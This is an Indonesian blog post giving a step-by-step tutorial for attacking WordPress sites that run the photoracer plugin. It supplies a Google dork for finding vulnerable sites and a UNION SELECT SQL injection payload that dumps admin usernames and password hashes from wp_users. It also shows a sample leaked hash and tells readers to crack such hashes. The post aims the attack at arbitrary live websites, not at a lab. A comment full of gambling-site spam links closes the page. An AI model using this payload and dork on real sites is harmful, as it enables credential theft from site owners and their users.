Exploit Wordpress with sql injection
waaah udah lama flazer udah tidak berbagi lagi hehehe sekarang saya coba corat coret lagi ya di blogger tercinta ini yuhuuu langsung aja ya lagi males nulis :D
Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.
1. Ketik dork berikut ke kotak pencarian google :
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.
3. Tambahkan exploit ini di belakang url :
+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1
menjadi www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.Contoh :
admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1
5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu,
untuk password yang berupa MD5 bisa di crack menggunakan brute force dll :D
1 komentar — Skip ke Kotak Komentar
thanks gan buat info nya yang sangat membantu sekali ^.^
Review Agen Judi Online Terpercaya
Judi Casino Online
Judi Poker Online IDNPoker
Bandar Domino Online Teraman
Agen Judi Slot Gaming Online Terbaik
Agen Live Casino Online Menguntungkan
Agen Capsa Susun Online Terpercaya
Judi Poker Online Resmi
Posting Komentar — or Kembali ke Postingan